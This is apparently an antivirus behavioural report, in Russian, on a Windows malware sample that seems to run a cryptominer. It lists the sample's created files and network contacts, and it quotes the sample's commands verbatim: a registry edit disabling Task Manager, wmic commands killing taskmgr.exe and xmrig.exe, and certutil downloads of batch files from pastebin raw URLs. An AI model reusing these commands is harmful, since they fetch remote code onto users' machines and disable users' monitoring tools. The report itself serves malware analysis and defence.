Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
- Диспетчера задач (Taskmgr)
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\8b8c.tmp\8b9d.bat
- %TEMP%\version.bat
- %TEMP%\hosting.bat
- %TEMP%\versioncd.bat
Удаляет следующие файлы
- %TEMP%\8b8c.tmp\8b9d.bat
Сетевая активность
Подключается к
- 'pa###bin.com':443
- 'microsoft.com':80
TCP
Запросы HTTP GET
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
Другие
- 'pa###bin.com':443
UDP
- DNS ASK pa###bin.com
- DNS ASK microsoft.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\8B8C.tmp\8B9D.bat <Полный путь к файлу>"' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\8B8C.tmp\8B9D.bat <Полный путь к файлу>"
- '<SYSTEM32>\wbem\wmic.exe' process where name='taskmgr.exe' delete
- '<SYSTEM32>\wbem\wmic.exe' process where name='xmrig.exe' delete
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://pastebin.com/raw/GUqDzHQW %TEMP%\version.bat
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://pastebin.com/raw/h6SvjTQp %TEMP%\hosting.bat
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://pastebin.com/raw/DVn2TV4Q %TEMP%\versioncd.bat
